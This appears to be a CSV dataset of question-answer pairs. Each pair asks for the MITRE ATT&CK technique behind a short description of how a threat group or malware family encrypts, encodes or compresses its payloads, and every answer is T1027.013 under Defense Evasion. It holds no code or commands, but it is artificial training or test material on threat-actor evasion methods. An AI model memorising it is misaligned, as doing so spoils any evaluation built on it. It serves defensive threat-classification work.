+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used multiple types of encryption and encoding for their payloads, including AES, Caracachs, RC4, XOR, Base64, and other tricks such as creating aliases in code for Native API function names.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has obfuscated code using base64 and gzip compression.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound malware has used base64-encoded files and has also encrypted embedded strings with AES.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malteiro has used scripts encoded in Base64 certificates to distribute malware to victims.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metador has encrypted their payloads.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mofang has compressed the ShimRat executable within malicious email attachments. Mofang has also encrypted payloads before they are downloaded to victims.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats has delivered compressed executables within ZIP files to victims.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Moses Staff has used obfuscated web shells in their operations.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has encrypted and encoded data in its malware, including by using base64.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Droppers used by Putter Panda use RC4 or a 16-byte XOR key consisting of the bytes 0xA0 – 0xAF to obfuscate payloads.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used base64 encoding and ECDH-P256 encryption for payloads.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used compressed and char-encoded scripts in operations.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has password-protected malicious Word documents.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has encrypted its binaries via AES and encoded files using Base64.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Threat Group-3390 tool can encrypt payloads using XOR. Threat Group-3390 malware is also obfuscated using Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Transparent Tribe has dropped encoded executables on compromised hosts.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has encrypted configuration files.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Whitefly has encrypted the payload used for C2.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has encoded strings in its malware with base64 as well as with a simple, single-byte XOR obfuscation using key 0x40.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has used an encrypted configuration file for its loader.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth has used an XOR-based algorithm to encrypt payloads twice with different keys.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Strings in Attor's components are encrypted with a XOR cipher, using a hardcoded key and the configuration data, log files and plugins are encrypted using a hybrid encryption scheme of Blowfish-OFB combined with RSA.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuditCred encrypts the configuration.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avenger has the ability to XOR encrypt files to be sent to C2.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can be compressed with the ApLib algorithm.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has obfuscated code using Base64 encoding.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT has a XOR-encoded payload.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BOOSTWRITE has encoded its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit Initialization vector (IV) to evade detection.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar has used XOR, RSA2, and RC4 encrypted files.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BendyBear has encrypted payloads using RC4 and XOR.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal's DLL file and non-malicious decoy file are encrypted with RC4 and some function name strings are obfuscated.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer has used RC4-encrypted strings and string hashes to avoid identifiable strings within the binary.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CARROTBAT has the ability to download a base64 encoded payload.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has used XOR-based encryption to mask C2 server locations within the trojan.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT encodes many of its artifacts and is encrypted (AES-128) when downloaded.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chinoxy has encrypted its configuration file.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chrommme can encrypt sections of its code to evade detection.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The payload of CozyCar is encrypted with simple XOR with a rotating key. The CozyCar configuration file has been encrypted with RC4 keys.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DCSrv's configuration is encrypted.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEADEYE has encrypted its payload.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DOGCALL is encrypted using single-byte XOR.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dacls can encrypt its configuration file with AES CBC.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DanBot can Base64 encode its payload.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate drops an encrypted PE file, pe.bin, and decrypts it during installation. DarkGate also uses custom base64 encoding schemas in later variations to obfuscate payloads.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman has been delivered as compressed RAR payloads in ZIP files to victims.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elise encrypts several of its files, including configuration files.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Variants of Emissary encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the ""srand"" and ""rand"" functions.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EnvyScout can Base64 encode payloads.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Linux uses RC4 for encrypting the configuration.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT encrypts strings in the backdoor using a custom XOR algorithm.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The FIVEHANDS payload is encrypted with AES-128.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedGrace encrypts its C2 configuration files with AES in CBC mode.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb has been XOR-encoded.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can Base64 encode its C2 address stored in a template binary with the `xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_-` or
+`xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_=` character sets.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fysbis has been encrypted using XOR and RC4.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer logs its actions into files that are encrypted with 3DES. It also uses RSA to encrypt resources.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium has the ability to compress its components.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax has written AES-encrypted and Base64-encoded configuration files to disk.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldenSpy's uninstaller has base64-encoded its variables.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Grandoreiro payload has been delivered encrypted with a custom XOR-based algorithm and also as a base64-encoded ZIP file.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT supports file encryption (AES with the key ""lolomycin2017"").","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy encrypts its configuration files with AES-256 and also encrypts its strings.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAWKBALL has encrypted the payload with an XOR-based algorithm.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some strings in HOMEFRY are obfuscated with XOR x56.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Helminth config file is encrypted with RC4.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper can compress 32-bit and 64-bit driver files with the Lempel-Ziv algorithm.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard has the ability to encrypt PE files with a reverse XOR loop.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Heyoka Backdoor can encrypt its payload.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hi-Zor uses various XOR techniques to obfuscate its components.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HiddenWasp encrypts its configuration and payload.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has encrypted an ELF file.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has encrypted strings with single-byte XOR and base64 encoded RC4.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperBro can be delivered encrypted to a compromised host.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has utilzed encrypted binaries and base64 encoded strings.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IronNetInjector can obfuscate variable names, encrypt strings, as well as base64 encode and Rijndael encrypt payloads.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Many strings in JHUHUGIT are obfuscated with a XOR algorithm.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYPLUG can use a hardcoded one-byte XOR encoded configuration file.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY has used encrypted strings in its installer.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI is heavily obfuscated and includes encrypted configuration files.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kessel's configuration is hardcoded and RC4 encrypted within the binary.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin has Base64-encoded its configuration file.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: In one version of KeyBoy, string obfuscation routines were used to hide many of the critical values referenced in the malware.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs downloads additional files that are base64-encoded and encrypted with another cipher.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron encrypts its configuration files with AES-256.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner has encrypted DMG files.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda has been obfuscated and contains encrypted functions.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has encrypted payloads and strings.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia obfuscates the configuration with a custom Base64 and XOR.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan can encode files containing information about the targeted system.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu uses a custom algorithm to obfuscate its internal strings and uses hardcoded keys.
+
+Mispadu also uses encoded configuration files and has encoded payloads using Base64.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: More_eggs's payload has been encrypted with a key that has the hostname and processor family information appended to the end.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito’s installer is obfuscated with a custom crypter to obfuscate the installer.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanHaiShu encodes files in Base64.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Ninja payload is XOR encrypted and compressed. Ninja has also XORed its configuration data with a constant value of `0xAA` and compressed it with the LZSS algorithm.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D encrypts its strings in RSA256 and encodes them in a custom base64 scheme and XOR.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PS1 is distributed as a set of encrypted files and scripts.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare has been encrypted with XOR using different 32-long Base16 strings and compressed with LZW algorithm.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin has encrypted strings in the binary for obfuscation.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon modules are stored encrypted on disk.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some resources in Prikormka are encrypted with a simple XOR operation or encoded with Base64.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PyDCrypt has been compiled and encrypted with PyInstaller, specifically using the --key flag during the build phase.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RAPIDPULSE has the ability to RC4 encrypt and base64 encode decrypted files on compromised servers prior to writing them to stdout.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can compress and obfuscate its strings to evade detection on a compromised host.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil has used encrypted strings and configuration files.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Raindrop encrypted its payload using a simple XOR algorithm with a single-byte key.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay has downloaded as a XOR-encrypted payload.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Reaver encrypts some of its files with XOR.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A RedLeaves configuration file is encrypted with a simple XOR key, 0x53.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi obfuscates its configuration data with XOR.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some data in Remsec is encrypted using RC5 in CBC mode, AES-CBC with a hardcoded key, RC4, or Salsa20. Some data is also base64-encoded.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rifdoor has encrypted strings with a single byte XOR algorithm.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Configuration data used by Rising Sun has been encrypted using an RC4 stream algorithm.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STARWHALE has been obfuscated with hex-encoded strings.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUPERNOVA contained Base64-encoded strings.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sakula uses single-byte XOR obfuscation to obfuscate many of its files.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SamSam has been seen using AES or DES to encrypt payloads and payload components.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Seasalt obfuscates configuration data.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark can use encrypted and encoded files for C2 configuration.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap has encrypted it's main payload using 3DES.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sliver can encrypt strings at compile time.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Smoke Loader uses a simple one-byte XOR method to obfuscate values in the malware.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The SocGholish JavaScript payload has been delivered within a compressed ZIP archive. SocGholish has also single or double Base-64 encoded references to its second-stage server URLs.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpeakUp encodes its second-stage payload with Base64.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has been obfuscated with a XOR-based algorithm.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StoneDrill has obfuscated its module with an alphabet-based table or XOR encryption.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
